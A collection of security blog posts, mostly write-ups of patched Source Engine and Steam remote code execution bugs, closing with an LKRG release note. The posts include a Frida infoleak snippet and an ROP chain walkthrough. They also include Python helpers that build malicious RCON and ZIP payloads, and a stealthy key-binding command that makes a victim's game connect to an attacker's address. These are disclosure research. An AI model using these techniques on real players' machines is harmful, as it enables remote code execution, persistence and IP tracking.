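        if (top === 0x7b || top === 0x7c) { // plausible module address range
            candidates.push(ptr(value));
        }
    }
    return candidates;
}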

Here’s what the final output of the exploit looked like against a typical user:

[*] Intercepting ReadBytes (frag = 0)
0x0: 0x14b5041
0x4: 0x14001402
0x8: 0x0
0xc: 0x0
0x10: 0xd99e8b00
0x14: 0xffff00d3
0x18: 0xffff00ff
0x1c: 0x8ff
0x20: 0x0
0x24: 0x0
0x28: 0x18000
0x2c: 0x74000000
0x30: 0x2e747365
0x34: 0x50747874
0x38: 0x6054b
0x3c: 0x1000000
0x40: 0x36000100
0x44: 0x27000000
[...]
0xcc: 0xafdd68
0xd0: 0xa097d0c
0xd4: 0xa097d00
0xd8: 0xab780c
0xdc: 0x4
0xe0: 0xab7778
0xe4: 0x7ac9ab8d
0xe8: 0x0
0xec: 0x80
0xf0: 0xab7804
0xf4: 0xafdd68
0xf8: 0xab77d4
0xfc: 0x0
[*] leakedPointer: 0x7ac9ab8d
[*] Engine_Leak2 offset: 0x23ab8d
[*] leakedBase: 0x7aa60000

Only one of these values had a lower WORD that made sense as a module offset (the one at 0xE4), so it was easily selectable from the list of DWORDs. After leaking this pointer, I traced it back in IDA to a return address for the upper stack frame of this function, which makes total sense. I gave it the label Engine_Leak2 in IDA, which could then be loaded directly through my ret-sync connection to dynamically calculate the proper base address of the engine.dll module:

// calculate the engine base based on the RE'd address we know from the leak
static convertLeakToEngineBase(leakedPointer: NativePointer) {
    console.log("[*] leakedPointer: " + leakedPointer)

    // get the known offset of the leaked pointer in our engine.dll
    let knownOffset = se.util.require_offset("Engine_Leak2");
    console.log("[*] Engine_Leak2 offset: " + knownOffset)

    // use the offset to find the base of the client's engine.dll
    let leakedBase = leakedPointer.sub(knownOffset);
    console.log("[*] leakedBase: " + leakedBase)

    if ((leakedBase.toInt32() & 0xFFFF) !== 0) {
        console.log("[!] Failed leak...")
        return null;
    }

    console.log("[*] Got it!")
    return leakedBase;
}

The Final Chain + RCE!

After successfully developing the infoleak, we now have both a pointer leak and an arbitrary execute bug. These two are sufficient for us to craft a ROP chain and pop that sweet, sweet calculator. The nice part about Frida being a Python module at its core is that you can use pyinstaller to turn any Frida script into an all-in-one executable. That way, all you have to do is copy the .exe onto a server, run your Source dedicated server, and launch the .exe to arm the server for exploitation.

Anyway, here is the full step-by-step detail of chaining the two bugs together:

  1. Player joins the exploitation server. This is picked up by the PoC script and it begins to exploit the client.

  2. Player downloads the map file from the server. The map file is specially prepared to install test.txt into the GAME filesystem path with the compromised length.

  3. The server executes RequestFile to request the test.txt file from the pakfile. The client builds fragments for the new file and begins sending 0x100 sized fragments to the server, leaking stack contents. Inside the stack contents is a leaked stack frame return address from a previous call to bf_read::ReadBytes. By doing some calculations on the server, this achieves a full ASLR protection bypass on the client.

  4. The malicious server calculates the base of engine.dll on the client instance using the leaked pointer. This allows the server to now build a pointer value in the exploit payload to anywhere within engine.dll. Without this infoleak bug, the payload could not be built because the attacker does not know the location of any module due to ASLR.

  5. The server script builds a fake object and fake vtable pointer on the target client instance by replicating a ConVar onto the client, placing the fake vtable pointer at a known location (the global ConVar). The PoC replicates the fake vtable onto sv_mumble_positionalaudio, which is a replicated ConVar inside of client.dll. The location of the contents of this replicated ConVar can be calculated from sv_mumble_positionalaudio->m_pszString and is used in later exploitation steps.

  6. The server builds a ROP chain payload to execute the Windows API call for ShellExecuteA. This ROP chain is used to bypass the NX protection on modern Windows systems. The chain utilizes the known addresses in engine.dll that were leaked from the exploitation of the separate bug in Step 3. Upon successful exploitation, this ROP chain can execute arbitrary code.

  7. The script again replicates the ConVar sv_downloadurl onto the client instance with the value C:/Windows/System32/winver.exe. This is used by the ROP chain as the target program to execute with ShellExecuteA. This ConVar exists inside of engine.dll, so the pointer sv_downloadurl->m_pszString is now at an attacker-known location.

  8. The server sends a crafted NET_Tick message to modify the value of g_ClientGlobalVariables->tickcount to be a pointer to a stack pivot gadget found inside of engine.dll (again, leaked from Step 3). Essentially, this is another trick to get a pointer value to exist at an attacker controlled location within engine.dll.

  9. Now, the next bug will be used by creating a specially crafted SVC_PacketEntities netmessage which will call CL_CopyExistingEntity on the client instance with the vulnerable value for m_nNewEntity. This value exploits the array overrun in GetClientNetworkable inside of client.dll, confusing the returned pointer into being a pointer to sv_mumble_positionalaudio->m_pszString (also inside client.dll). At the location of sv_mumble_positionalaudio->m_pszString is the fake object pointer created in Step 5. This object pointer redirects execution by pretending to be an IClientNetworkable* object and forwards the virtual method call to the value found within g_ClientGlobalVariables->tickcount. This means we can set the instruction pointer to any value specified by the NET_Tick trick we used in Step 8.

  10. Lastly, to execute the ROP chain and achieve RCE, g_ClientGlobalVariables->tickcount is pointed at a stack pivot gadget inside of engine.dll. This pivots the stack to the ROP payload that was placed in sv_mumble_positionalaudio->m_pszString in Step 5. The ROP chain then begins execution. The chain loads the necessary arguments to call ShellExecuteA, then executes whatever program path we replicated onto sv_downloadurl in Step 7. In this case, it is used to execute winver.exe as proof of concept. This chain can execute any code of the attacker’s choosing, and has full permissions to access all of the user’s files and data.

And there you have it. This entire exploitation happens automatically, using Frida to inject into the dedicated server process and instrument all of the steps above. It’s quite involved, but the result is pretty awesome! Here’s a video of the full PoC in action; be sure to fullscreen it so it’s easier to see:

Disclosure Timeline

  • [2020-05-13] Reported to Valve through HackerOne
  • [2020-05-18] Bug triaged
  • [2021-04-28] Notification that the bugs were fixed in Beta
  • [2021-04-30] Bounty paid ($7500) and notification that the bugs were fixed in Retail

Supporting Files

Exploit PoC and the map hacking Python script referenced in this post are available in full at:

https://github.com/Gbps/sourceengine-packetentities-rce-poc

For the Frida exploit chain: https://github.com/Gbps/sourceengine-packetentities-rce-poc/tree/master/src/agent

Be sure to give it a ⭐ if you liked it!

Final thoughts

This chain was super fun to develop, and the constraints I placed on myself made the exploit way more interesting than my first submission. I’m glad that the report finally went through so I could publish the information for everyone to read. It really goes to show that even a fairly simple set of bugs on paper can turn into a complex exploitation effort quickly when targeting big software applications. But, doing so helps you develop skills that you might not necessarily pick up from simple CTF problems.

Incorporating the Frida project definitely reinvigorated my drive to continue poking and testing PoCs for bugs, as the process for scripting up examples was much nicer than before. I hope to spend some time in a future post to discuss more ways to utilize Frida on the desktop, and also hope to publish my ret-sync Frida plugin in an official capacity on my GitHub soon.

I’m also working on some other projects in the meantime, off and on. One is a fairly large project which implements a CS:GO client from scratch in Rust to help improve my skills with the language. After a ton of work, I can happily say my client can authenticate with Steam, fully connect and load into a server, send and receive netchannel packets with the game server, and host a fake console to execute concommands. There is no graphical portion of this; it is entirely command-line based.

In addition, I’ve started to shift my focus somewhat away from Source and onto Steam itself. Steam is a vastly complex application, and the networking protocol it uses is orders of magnitude more complex than Source’s. There hasn’t been much public research on Steam’s networking protocols, so I’ve written a few tools that can fully encode/decode this networking layer and intercept packets to learn how they work. Even an idle instance of Steam creates a lot of very interesting traffic that very few people have looked at! More information on this hopefully soon.

For now, I don’t have a timeline for the release of any of those projects, or for the next blog post I will write, but hopefully it won’t be as long as it took to get this one out ;)

Thank you for reading!

Exploiting the Source Engine (Part 1)

2 August 2018 at 00:00

Introduction

It’s been a long time coming, but here’s my first post in a series about finding and exploiting bugs in Valve Software’s Source Engine. I was first introduced to it through the sandbox game Garry’s Mod in 2010, which led me into the field of reverse engineering and paved the way for my favorite hobby, my education, and my eventual employment.

I took a long hiatus from working with the Source Engine when I went to college and got obsessed with playing CTF competitions, a type of competition where participants solve challenges that mimic real-world reverse engineering and exploitation tasks. One day, I saw a post about a TF2 RCE proof-of-concept released against the engine. To be honest, the bug and the exploit were very simple, and nothing more difficult than some of the intermediate challenges one would find in a good CTF. With that knowledge under my belt, I decided to prove myself and come back to the Source Engine with the goal of finding a true Remote Code Execution (RCE).

As it turns out, this was around the time that Valve released their bug bounty program through HackerOne, where they boasted a bounty range of $1,000 - $25,000 for these kinds of bugs. With a bit of luck, I successfully found and wrote a proof-of-concept for a critical server-to-client RCE bug, and was given a generous bounty of $15,000 from Valve. Everything in this series is dedicated to information I’ve learned along the way about the engine.

NOTE: As of writing, the vulnerability has not been publicly disclosed. I will be doing a writeup of the bug and exploit chain if/when it goes public.

Source games Dota 2, CS:GO, and TF2 continue to hold top active player counts on Steam.

The Source Engine

The Source Engine is a third-generation derivative of id Software’s famous Quake engine and Valve’s own GoldSrc engine (the HL1 engine). The engine itself has been used to create some of the most famous FPS game series in history, including Half-Life, Team Fortress, Portal, and Counter-Strike.

Timeline:

  • 1998 - Valve showcases GoldSrc, a heavily modified Quake engine.
  • 2004 - Valve releases the Source Engine based on GoldSrc.
  • 2007 - The source code to the Source Engine is leaked.
  • 2012 - CS:GO is released, and with it, “Source 1.5” begins development.
  • 2013 - Valve releases the public 2013 SDK for the TF2/CS:S engine containing most of the code necessary to write games for the engine.
  • 2015 - The “Reborn” update for Dota 2 brings the first Source 2 game to market.
  • 2018 - Valve opens their HackerOne program to the public.

The Code:

The first thing that I didn’t truly appreciate about this engine (and other engines in general) is how large it is. The engine is gigantic, featuring millions of lines of C++ code to develop, render, and run games of all types (but mostly first-person games).

The code itself is old and unmaintained. Most of the code was very obviously rushed out to meet deadlines, and honestly it is a huge surprise that the engine even functions at all. This is not unique to Valve, and is very typical in the game development world.

Assets such as models, particles, and maps are all built and run using custom file formats developed by Valve or extended from Quake (yes, file format parsers from 1999). There are still usages of obviously unsafe functions such as strcpy and sprintf, and in general the engine itself has a history of “add, add, add” and very little maintenance.

A lot of the C++ classes included in the engine are straight-up dead code. Big features were designed and developed, yet only used for very small parts of the engine. The 2013 SDK tools themselves still have difficulty building valid files for current versions of the engine. Classes derive from anywhere from one to nine or more base classes, and tend to feature a never-ending maze of abstractions on abstractions. Navigating this codebase is time-consuming and generally unpleasant for beginners. All in all, the engine is due for a legacy code rewrite that will likely never happen.

Intro to Source Games:

Source Engine games consist of two separate parts: the engine and the game.

The engine consists of all of the typical game engine features like rendering, networking, the asset loaders for models and materials, and the physics engine. When I refer to the Source Engine, I am referring to this part of the game. The bulk of the engine’s code is found in engine.dll, which is found in the path /bin/engine.dll from the game’s root. This same base code is used in some manner across all SE games, and is typically utilized by 3rd party game developers in its pre-compiled form. The code for the Source Engine was leaked (luckily) as part of the 2007 Valve leak, and this leak is all the code that is available to the public for the engine.

The second part, the game, consists of two main binaries, client.dll and server.dll. These contain the compiled game that will use the engine, and both utilize engine.dll heavily in order to function. Inside of client.dll, you will find the code responsible for the GUI subsystem of the game (named VGUI) and the clientside logic of the actual game itself. Inside of server.dll, you will find all of the code to communicate the game’s serverside logic to the remote player’s client.dll. Both of these dlls are found in /[gamedir]/bin/*.dll, where [gamedir] is the game abbreviation (csgo, tf2, etc.).

Both the server and client have shared code that defines the entities of the game and variables that will be synchronized. Shared code is compiled directly into each binary, but some C macro design ensures that only the server parts compile to server.dll, and vice-versa. The engine.dll entity system will synchronize the server’s simulation of the game, and the client’s dll will take these simulations and display them to the player through the engine.dll renderer.

Lastly, a big feature of all Source games that was taken and evolved from the Quake engine is the ConVar system. This system defines a series of variables and commands that are executed on an internal command line, very similar to a cmd.exe or /bin/sh shell. The difference is that, instead of executing new processes, these commands will run functions on either the client or server depending on where its run. The engine defines some low-level ConVars found on both the server and client, while the game dlls add more on top of that depending on the game dll that’s running.

  • A Console Variable (ConVar) takes the form of <name> <value>, where the value can be numerical or string based. Typically used for configuration, certain special ConVars will be synchronized. The server can always request the value of a client’s ConVar. Example: sv_cheats 1 sets the ConVar sv_cheats to 1, which enables cheats.
  • A Console Command (ConCommand) takes the form of <name> <arg0> <arg1> …, and defines a command with a backing C++ function that can be run from the developer console. Sometimes, it is used by the game or the engine to run remote functions (client -> server, server -> client). Example: changelevel de_dust executes the command changelevel with the argument de_dust, which changes the current map when run on the server console.

This is just an intro, more on all of this to follow in future posts.

The Bugs:

All of this old code and these custom formats are fantastic for a bug hunter. In 2018, all that’s truly necessary to perform a full-chain RCE is a good memory corruption bug to take control and an information leak to bypass ASLR. Typically, the former is the most difficult part of bug hunting in modern software, but as you will see later, for the Source Engine it is actually the latter.

Here is an overview of the Windows binaries:

  • 32-bit binaries
  • NX - Enabled
  • Full ASLR - Enabled (recently)
  • Stack Cookies - Disabled (in the cases it matters)

If you’re an exploit developer, you would probably find the lack of stack cookies in a game engine with millions of players to be a very shocking discovery. This is a critical shortcoming of the already aging engine, and is essentially unheard of in modern Windows binaries. Valve is well aware of this protection’s existence, and has chosen time and time again not to enable it. I have some speculation as to why (most likely performance or build-breaking issues), but regardless, there is a huge point to make: any controllable stack overflow can overwrite the instruction pointer and divert code execution.

Considering how much the stack is used in this engine, this is a huge benefit to bug hunters. One simple out-of-bounds (OOB) string copy, such as a call to strcpy, will result in swift compromise of the instruction pointer, straight into RCE. My first bug, unsurprisingly, was a stack overflow bug, not much different than you would find in a beginner-level CTF challenge. But unlike in a CTF, its implication of a full client machine compromise in a series of games with a huge player base led to the large payout.

Hunting:

When hunting for these bugs, I chose to take a slightly more difficult path of only performing manual code auditing on the publicly available engine code. What this allows me to do is both search for potentially useful bugs and also learn the engine’s internals along the way. While it might be enticing for me to just fuzz a file format and get lots of crashes, fuzzing tends to find surface level bugs that everyone’s finding, and never those really deep, interesting bugs that no one is finding.

As I said previously, the codebase for this engine is gigantic. You should take advantage of all of the tools available to you when searching. My preferred toolset is this:

  • Following code structure and searches using Visual Studio with Resharper++.
  • Cmder (with grep) to search for patterns.
  • IDA Pro to prove the existence of the bug in the newest build.
  • WinDbg and x64dbg to attach to the game and try to trigger the bug.
  • Sourcemod extensions to modify the server for proof-of-concepts

With these tools, my general “process” for bug hunting is this:

  1. Find some section of the client code I feel is exploitable and want to look into more closely

  2. Start reading code. I’ll read for hours until I come across what I think is a possible exploitable bug.

  3. From there, I will open up IDA Pro and locate the function I think is exploitable, then compare its current code with the old, public code I have available.

  4. If it still appears to be exploitable, I will try to find some method to trigger the exploitable function from in-game. This turns out to be one of the hardest parts of the process, because finding a triggerable path to that function is a very difficult task given the size of the engine. Sometimes, the server just can’t trigger the bug remotely. Some familiarity with the engine goes a long way here.

  5. Lastly, I will write Sourcemod plugins that will help me trigger it from a game server to the client, hoping to finally prove the existence of the bug and the exploitability in a proof-of-concept.

Next Time

Next post, I will go more in-depth into the codebase of the engine and explain the entity and networking systems that the engine utilizes to run the game itself. I will also begin introducing some of the techniques I used to write the exploits, including the ASLR and NX bypasses. There’s a whole lot more to talk about, and this post barely scratches the surface. At the moment, I’m in the process of working on a new undisclosed bug in the engine, hoping to turn this one into another big payout. Wish me luck!

— Gbps

CVE-2021-30481: Source engine remote code execution via game invites

By: floesen
20 April 2021 at 00:00

Steam is the most popular PC game launcher in the world. It gives millions of people the chance to play their favorite video games with their friends using the built-in friend and party system, so it’s safe to assume most users have accepted an invite at one point or another. There’s no real danger in that, is there?

In this blog post, we will look at how an attacker can use the Steamworks API in combination with various features and properties of the Source engine to gain remote code execution (RCE) through malicious Steam game invites.

Why game invites do more than you think they do

The Steamworks API allows game developers to access various Steam features from within their game through a set of different interfaces. For example, the ISteamFriends interface implements functions such as InviteUserToGame and ReplyToFriendMessage, which, as their names suggest, let you interact with your friends either by inviting them to your game or by just sending them a text message. How can this become a problem?

Things become interesting when looking at what InviteUserToGame actually does to get a friend into your current game/lobby. Here, you can see the function prototype and an excerpt of the description from the official documentation:

bool InviteUserToGame( CSteamID steamIDFriend, const char *pchConnectString );

“If the target user accepts the invite then the pchConnectString gets added to the command-line when launching the game. If the game is already running for that user, then they will receive a GameRichPresenceJoinRequested_t callback with the connect string.”

Basically, that means that if your friends do not already have the game started, you can specify additional start parameters for the game process, which will be appended at the end of the command line. For regular invites in the context of, e.g., CS:GO, the start parameter +connect_lobby in combination with your 64-bit lobby ID is appended. This very command, in turn, is executed by your in-game console and eventually gets you into the specified lobby. But where is the problem now?

When specifying console commands in the start parameters of a Source engine game, you are not given any limitations: you can arbitrarily execute any game command of your choice. Here, you can give free rein to your creativity; everything you can configure in the UI, and much more beyond that, can generally be tweaked using console commands. This allows for such funny things as messing with people’s game language, their sensitivity, their resolution, and generally everything settings-related you can think of. In my opinion, this is already quite questionable, but not extremely malicious yet.

Using console commands to build up an RCON connection

A lot of Source engine games come with something that is known as the Source RCON Protocol. Briefly summarized, this protocol enables server owners to execute console commands in the context of their game servers, in the same manner as you would typically configure something in your game client. This works by prefixing any console command with rcon before executing it. Doing so requires you to previously connect and authenticate yourself to the game server using the rcon_address and rcon_password commands. You might already know where this is going… An attacker can execute the InviteUserToGame function with the second parameter set to "+rcon_address yourip:yourport +rcon". As soon as the victim accepts the invite, the game will start up and try to connect back to the specified address without any notification whatsoever. Note that the additional +rcon at the end is required because the client does not initiate the connection until there is an attempt to actually communicate with the server. All of this is already very concerning, as such invites inherently leak the victim’s IP address to the attacker.

Abusing the RCON connection

A further look into how the Source engine implements RCON on the client side reveals the full potential. In CRConClient::ParseReceivedData, we can see how the client reacts to different types of RCON packets coming from the server. Within the scope of this work, we only look at the following three types of packets: SERVERDATA_RESPONSE_STRING, SERVERDATA_SCREENSHOT_RESPONSE, and SERVERDATA_CONSOLE_LOG_RESPONSE. In general, an RCON packet consists of a Size field, an ID, a Type, the Body, and a terminating Empty String field [1]; the content delivered by the packet starts with the Body member and is typically null-terminated with the Empty String field.
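For reference, such a packet is trivial to build by hand. Below is a minimal Python sketch based on the documented wire format [1] (the helper name is mine):

import struct

def rcon_packet(pkt_id: int, pkt_type: int, body: bytes) -> bytes:
    # <Size><ID><Type><Body><Empty String>: ID and Type are little-endian
    # int32 values; Size counts everything after the Size field itself.
    payload = struct.pack("<ii", pkt_id, pkt_type) + body + b"\x00\x00"
    return struct.pack("<i", len(payload)) + payload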

Now, starting with the first type: it allows an attacker hosting a malicious RCON server to print arbitrary strings into the connected victim’s game console for as long as the RCON connection remains open. This is not related to the final RCE, but it is too funny to just leave out; anything printed this way would certainly be surprising to anybody who sees it popping up in their console.

Let’s move on to the exciting part. To simplify matters, we will only explain how the client handles SERVERDATA_SCREENSHOT_RESPONSE packets, as the code is almost exactly the same for SERVERDATA_CONSOLE_LOG_RESPONSE packets. Eventually, the client treats the packet data it receives as a ZIP file and tries to find a file with the name screenshot.jpg inside. This file is subsequently unpacked to the root CS:GO installation folder. Unfortunately, we can control neither the name under which the screenshot is saved on disk nor the file extension. The screenshot is always saved as screenshotXXXX.jpg, where XXXX represents a 4-digit suffix starting at 0000, which is increased as long as a file with that name already exists.

void CRConClient::SaveRemoteScreenshot( const void* pBuffer, int nBufLen )
{
	char pScreenshotPath[MAX_PATH];
	do 
	{
		Q_snprintf( pScreenshotPath, sizeof( pScreenshotPath ), "%s/screenshot%04d.jpg", m_RemoteFileDir.Get(), m_nScreenShotIndex++ );	
	} while ( g_pFullFileSystem->FileExists( pScreenshotPath, "MOD" ) );

	char pFullPath[MAX_PATH];
	GetModSubdirectory( pScreenshotPath, pFullPath, sizeof(pFullPath) );
	HZIP hZip = OpenZip( (void*)pBuffer, nBufLen, ZIP_MEMORY );

	int nIndex;
	ZIPENTRY zipInfo;
	FindZipItem( hZip, "screenshot.jpg", true, &nIndex, &zipInfo );
	if ( nIndex >= 0 )
	{
		UnzipItem( hZip, nIndex, pFullPath, 0, ZIP_FILENAME );
	}
	CloseZip( hZip );
}

Note that an attacker can send these kinds of RCON packets without the client requesting anything beforehand. This alone gives an attacker an arbitrary file upload whenever the victim accepts the game invite; no memory corruption is required so far.
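To illustrate the file upload, a malicious server could push such a packet roughly as follows. This is a sketch reusing the rcon_packet helper from above; the numeric value of SERVERDATA_SCREENSHOT_RESPONSE is a placeholder, as the real constant lives in the engine’s RCON code:

import io, zipfile

SERVERDATA_SCREENSHOT_RESPONSE = 4  # placeholder value, check the engine sources

def screenshot_upload_packet(file_bytes: bytes) -> bytes:
    # Wrap an arbitrary payload as "screenshot.jpg" in an in-memory ZIP;
    # the client unpacks it into its game directory as screenshotXXXX.jpg.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("screenshot.jpg", file_bytes)
    return rcon_packet(0, SERVERDATA_SCREENSHOT_RESPONSE, buf.getvalue())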

Integer underflow in FindZipItem leads to remote code execution

The functions OpenZip, FindZipItem, UnzipItem, and CloseZip belong to a library called XZip/XUnzip. The specific version of the library which is used by the RCON handler dates back to 2003. While we found several flaws in the implementation, we will only focus on the first one that helped us get code execution.

As soon as CRConClient::SaveRemoteScreenshot calls FindZipItem to retrieve information about the screenshot.jpg file inside the archive, TUnzip::Get is called. Inside TUnzip::Get, the archive is parsed according to the ZIP file format. This includes processing the so-called central directory file header.

int unzlocal_GetCurrentFileInfoInternal (unzFile file, unz_file_info *pfile_info,
   unz_file_info_internal *pfile_info_internal, char *szFileName,
   uLong fileNameBufferSize, void *extraField, uLong extraFieldBufferSize,
   char *szComment, uLong commentBufferSize)
{
	// ...
	s=(unz_s*)file;
	// ...
	if (unzlocal_getLong(s->file,&file_info_internal.offset_curfile) != UNZ_OK)
		err=UNZ_ERRNO;
	// ...
}

In the code above, the relative offset of the local file header, located in the central directory file header, is read into file_info_internal.offset_curfile. This offset is used to locate the actual position of the compressed file in the archive, and it will play a key role later on.

Later in TUnzip::Get, a function with the name unzlocal_CheckCurrentFileCoherencyHeader is called. Here, the previously mentioned local file header is processed using the offset that was retrieved before. This is what the corresponding code looks like:

int unzlocal_CheckCurrentFileCoherencyHeader (unz_s *s,uInt *piSizeVar,
   uLong *poffset_local_extrafield, uInt  *psize_local_extrafield)
{
	// ...
	if (lufseek(s->file,s->cur_file_info_internal.offset_curfile + s->byte_before_the_zipfile,SEEK_SET)!=0)
		return UNZ_ERRNO;


	if (err==UNZ_OK)
		if (unzlocal_getLong(s->file,&uMagic) != UNZ_OK)
			err=UNZ_ERRNO;
	// ...
}

At first, a call to lufseek sets the internal file pointer to point to the local file header in the archive; this is very similar to how file handling works in the C standard library. Here, it can be assumed that there are no additional bytes in front of the archive, so s->byte_before_the_zipfile is 0. In our specific case, the RCON handler opened the ZIP archive with the ZIP_MEMORY flag, thus specifying that the archive is essentially just a byte blob in memory. Therefore, calls to lufseek only update a member in the file object.

int lufseek(LUFILE *stream, long offset, int whence)
{
	// ...
	else
	{ 
		if (whence==SEEK_SET) stream->pos=offset;
		else if (whence==SEEK_CUR) stream->pos+=offset;
		else if (whence==SEEK_END) stream->pos=stream->len+offset;
		return 0;
	}
}

Once lufseek returns, another function with the name unzlocal_getLong is invoked to read out the magic bytes that identify the local file header. Internally, this function calls unzlocal_getByte four times to read out every single byte of the long value. unzlocal_getByte in turn calls lufread to directly read from the file stream.

int unzlocal_getLong(LUFILE *fin,uLong *pX)
{
	uLong x ;
	int i = 0;
	int err;

	err = unzlocal_getByte(fin,&i);
	x = (uLong)i;

	if (err==UNZ_OK)
		err = unzlocal_getByte(fin,&i);
	x += ((uLong)i)<<8;

	// repeated two more times for the remaining bytes
	// ...
	return err;
}

int unzlocal_getByte(LUFILE *fin,int *pi)
{
	unsigned char c;
	int err = (int)lufread(&c, 1, 1, fin);
	// ...
}

size_t lufread(void *ptr,size_t size,size_t n,LUFILE *stream)
{
	unsigned int toread = (unsigned int)(size*n);
	// ...
	if (stream->pos+toread > stream->len) toread = stream->len-stream->pos;
	memcpy(ptr, (char*)stream->buf + stream->pos, toread); DWORD red = toread;
	stream->pos += red;
	return red/size;
}

Given the fact that s->cur_file_info_internal.offset_curfile can be arbitrarily controlled by modifying the corresponding field in the central directory structure, the stack can be smashed in the first call to lufread right on the spot. If you set the local file header offset to 0xFFFFFFFE, a chain of operations eventually leads to code execution.

First, the call to lufseek in unzlocal_CheckCurrentFileCoherencyHeader will set the pos member of the file stream to 0xFFFFFFFE. When unzlocal_getLong is called for the first time, unzlocal_getByte is also invoked. lufread then tries to read a single byte from the file stream. The variable toread inside lufread that determines the amount of memory to be read will be equal to 1 and therefore the condition if (stream->pos + toread > stream->len) (unsigned comparison) becomes true. stream->pos + toread calculates 0xFFFFFFFE + 1 = 0xFFFFFFFF and thus is likely greater than the overall length of the archive which is stored in stream->len. Next, the toread variable is updated with stream->len - stream->pos which calculates stream->len - 0xFFFFFFFE. This calculation underflows and effectively computes stream->len + 2. Note how in the call to memcpy the calculation of the source parameter overflows simultaneously. Finally, the call to memcpy can be considered equivalent to this:

memcpy(ptr, (char*)stream->buf - 2, stream->len + 2);

Given that ptr points to a local variable of unzlocal_getByte (the unsigned char c, just a single byte in size), this immediately corrupts the stack. Luckily, the memcpy call writes the entire archive blob to the stack, enabling us to also control the content of what is written.
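The unsigned 32-bit arithmetic is easy to reproduce. The following Python lines mirror lufread’s bounds check and fix-up; the archive length is just an example value:

MASK = 0xFFFFFFFF
pos, length, toread = 0xFFFFFFFE, 0x1000, 1    # stream->pos, stream->len, 1 byte

if (pos + toread) & MASK > length:             # the bounds check triggers...
    toread = (length - pos) & MASK             # ...but the fix-up underflows
print(hex(toread))                             # 0x1002 == length + 2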

At this point, all that is left to do is to construct a ZIP archive that has the local file header offset set to 0xFFFFFFFE and otherwise consists primarily of ROP gadgets. To do so, we started with a legitimate archive that contains a single screenshot file. Then, we proceeded to corrupt the offset as mentioned above and observed where to put the gadgets based on the faulting EIP value. For the ROP chain itself, we exploited the fact that one of the DLLs loaded into the game, xinput1_3.dll, has ASLR disabled. That being said, its base address can be somewhat reliably guessed. The exploit only ever fails when its preferred address is already occupied by another DLL. Without doing proper statistical measurements, the probability of the exploit working is estimated to be somewhere around 80%. For more details, feel free to check out the PoC, which is linked in the last section of this article.
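For illustration, the offset corruption itself only takes a few lines. The sketch below patches the 4-byte "relative offset of local header" field, which sits 42 bytes into the central directory file header according to the ZIP specification; it assumes a single-entry archive, so the first header found is the right one:

import struct

CDFH_SIG = b"PK\x01\x02"  # central directory file header signature

def corrupt_local_header_offset(zip_bytes: bytes) -> bytes:
    # Overwrite the "relative offset of local header" field with 0xFFFFFFFE
    field = zip_bytes.index(CDFH_SIG) + 42
    return zip_bytes[:field] + struct.pack("<I", 0xFFFFFFFE) + zip_bytes[field + 4:]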

Advancing the RCE even more

Interestingly, at the very end, you can once again see how this exploit benefits from the start parameter injection and the RCON capabilities.

Let’s start with the apparent fact that the arbitrary file upload, which was discussed previously, greatly helps this exploit reach its full potential. One shellcode to rule them all, in other words: whether you want to execute the calculator or a malicious binary you previously uploaded really does not matter; all that needs to be done is changing a single string in the exploit shellcode. It also does not matter that your binary has been saved under an image file extension.

Finally, there is still something that can be done to make the exploit more powerful. We cannot change the fact that the exploit attempts fail from time to time due to bad luck with the base addresses, but what if we had unlimited tries to attempt the code execution? Seems unreasonable? It actually is very reasonable.

The Source engine comes with the console command host_writeconfig that allows us to write out the current game configuration to the config file on the disk. Obviously, we can also inject this command using game invites. Right before doing that, however, we can use bind to configure any key that is frequently pressed by players to execute the RCON connection commands from the very beginning. Bonus points if you make the keys maintain their original functionality to remain stealthy. Once we configured such a key, we can write out the settings to the disk so that the changes become persistent. Here is an example showing how the tab key can be stealthily configured to initiate an outgoing RCON connection each time it is pressed.

+bind "tab" "+showscores;rcon_address ip:port;rcon" +host_writeconfig

Now, after accepting just a single invite, you can try to run the exploit on your victims whenever they look at the scoreboard. Binding +showscores together with the RCON commands is what keeps the tab key showing the scoreboard as usual.

Timeline and final words

  • [2019-06-05] Reported to Valve on HackerOne
  • [2019-09-14] Bug triaged
  • [2020-10-23] Bounty paid ($8000) & notification that initial fix was deployed in Team Fortress 2
  • [2021-04-17] Final patch

PoC exploit code can be found on my GitHub. The vulnerability was given a severity rating of 9.0 (critical) by Valve.

The recent updates make it impossible to carry out this exploit any longer. First of all, Valve removed the offending RCON command handlers, making both the arbitrary file upload and the code execution in the unzipping code impossible. Also, at least for CS:GO, Valve now seems to use GetLaunchCommandLine instead of the OS command line. However, in CS:S (and maybe other games?) the OS command line apparently is still in use. For those games, at least a warning is now displayed that shows the parameters your game is about to start with. The next image shows what such a warning looks like when accepting an invite that rebinds a key and establishes an RCON connection at the same time.

Remember that if you click Ok here, you are more or less agreeing to install a persistent IP logger.

At the very end, I would like to talk about a different matter. I feel it is imperative to say a few final words about the situation with Valve and their bug bounty program. To sum up, the public disclosure of this bug’s existence has caused quite a stir regarding Valve’s slow response times to bug reports. I never wanted to just point the finger at Valve and complain about my experiences; I want to actually change something in the long run, too. The efforts that other researchers have put, and are going to put, into the search for bugs should not be in vain. Hopefully, things will improve in the future so we can happily work with Valve again to enhance the security of their games.

  1. https://developer.valvesoftware.com/wiki/Source_RCON_Protocol 

LKRG 0.9.0 has been released!

By: pi3
12 April 2021 at 21:54

During LKRG development and testing I’ve found 7 Linux kernel bugs; 4 of them have CVE numbers (however, 1 CVE number covers 2 bugs):

CVE-2021-3411  - Linux kernel: broken KRETPROBES and OPTIMIZER
CVE-2020-27825 - Linux kernel: Use-After-Free in the ftrace ring buffer
                 resizing logic due to a race condition
CVE-2020-25220 - Linux kernel Use-After-Free in backported patch for
                 CVE-2020-14356 (affected kernels: 4.9.x before 4.9.233,
                 4.14.x before 4.14.194, and 4.19.x before 4.19.140)
CVE-2020-14356 - Linux kernel Use-After-Free in cgroup BPF component
                 (affected kernels: since 4.5+ up to 5.7.10)

I’ve also found 2 other issues related to the ftrace UAF bug (CVE-2020-27825):

  • A deadlock issue which was not really addressed; the developers said they would take a look, but there have not been many updates on that since.
  • A problem in the code related to the hwlatd kernel thread: it synchronizes incorrectly with its launcher/killer, so you can trigger kernel WARNs all the time.

CVE-2021-3411 refers to 2 different types of bugs:

  • Broken KRETPROBES (recently reported)
  • Incompatibility of the KPROBE optimizer with the latest changes in the linker.

Additionally, I’ve also found a bug in the kernel’s signal handling for a dying process:

CVE-2020-12826 – Linux kernel prior to 5.6.5 does not sufficiently restrict exit signals

